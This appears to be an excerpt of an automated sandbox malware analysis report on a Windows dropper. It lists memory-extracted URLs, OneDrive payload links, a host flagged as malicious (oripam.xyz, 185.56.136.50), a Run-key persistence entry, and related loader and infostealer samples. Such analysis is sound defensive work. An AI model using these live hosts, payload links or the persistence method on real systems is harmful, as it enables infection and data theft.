                                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://ocsp.sectigo.com0SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ypfgrg.sn.files.1drv.com/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyywdORSecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://ypfgrg.sn.files.1drv.com/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3jQXO7Clmgncrs.PIF, 00000006.00000002.1836211826.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1836211826.00000000007AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ypfgrg.sn.files.1drv.com:443/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyySecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000741000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://live.com/GClmgncrs.PIF, 00000006.00000003.1833585649.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.ipify.org/tsrcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://r3.i.lencr.org/0GsrcngmlC.pif, 00000005.00000002.1876165964.0000000030227000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003004F000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://onedrive.live.com/SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000938000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.ipify.orgsrcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ypfgrg.sn.files.1drv.com/DClmgncrs.PIF, 00000006.00000003.1833585649.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.c.lencr.org/0srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353A8000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://x1.i.lencr.org/0srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353A8000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://ypfgrg.sn.files.1drv.com/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0CmTqClmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000997000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://live.com/Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://mail.oripam.xyzsrcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F7F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F8F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEDF000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://oripam.xyzsrcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F7F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F8F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEDF000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://r3.o.lencr.org0srcngmlC.pif, 00000005.00000002.1876165964.0000000030227000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003004F000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://ypfgrg.sn.files.1drv.com/y4m7fJhE-49Pt4dSp9jiqldsLsML_i9iJ0IU-qjBsvNj8FZRj4pBDSp-HX0gkJLIgC5Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesrcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ypfgrg.sn.files.1drv.com:443/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3jClmgncrs.PIF, 00000006.00000003.1833585649.00000000007A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://ocsp.sectigo.com0CSecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://cps.root-x1.letsencrypt.org0srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003003A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.pmail.com0SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1708520498.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1681956629.0000000022551000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682687395.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705852154.00000000225FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1838777437.0000000002A16000.00000004.00001000.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1907994741.0000000002A96000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif.0.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    13.107.139.11
                                                                    dual-spov-0006.spov-msedge.netUnited States
                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    185.56.136.50
                                                                    oripam.xyzMalta
                                                                    60558SECUREDSERVERS-EUtrue
                                                                    173.231.16.75
                                                                    api4.ipify.orgUnited States
                                                                    18450WEBNXUSfalse
                                                                    Joe Sandbox version:39.0.0 Ruby
                                                                    Analysis ID:1380665
                                                                    Start date and time:2024-01-24 21:31:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 10m 41s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:14
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@16/9@4/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 91%
                                                                    • Number of executed functions: 151
                                                                    • Number of non-executed functions: 140
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                                    • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                    TimeTypeDescription
                                                                    20:32:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Clmgncrs C:\Users\Public\Clmgncrs.url
                                                                    20:32:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Clmgncrs C:\Users\Public\Clmgncrs.url
                                                                    21:31:54API Interceptor2x Sleep call for process: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe modified
                                                                    21:32:02API Interceptor150605x Sleep call for process: srcngmlC.pif modified
                                                                    21:32:10API Interceptor2x Sleep call for process: Clmgncrs.PIF modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    13.107.139.11SCAN_DSC0027929829.PDF..exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                      DF0987890000.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                        fBb1IzrM3E.exeGet hashmaliciousDBatLoaderBrowse
                                                                          Znokqyctuubnie.exeGet hashmaliciousDBatLoaderBrowse
                                                                            3002918291829182.exeGet hashmaliciousDBatLoaderBrowse
                                                                              PI_and_payment_confirmed.exeGet hashmaliciousDBatLoaderBrowse
                                                                                best.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                  Stmt_2024-01.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                    fattura proforma pdf.exe.xzGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                      https://1drv.ms/b/s!AtS4AT1e0BnKbeR4gH9MVXH2aYAGet hashmaliciousUnknownBrowse
                                                                                        185.56.136.50HJT3fdlBod.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • timefrieghts.com/wp-content/plugins/wpcargo/includes/config/binned_iZyvWaLXE113.bin
                                                                                        173.231.16.75rnarud__ba20226_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          HS44892321-T01.exeGet hashmaliciousAgentTeslaBrowse
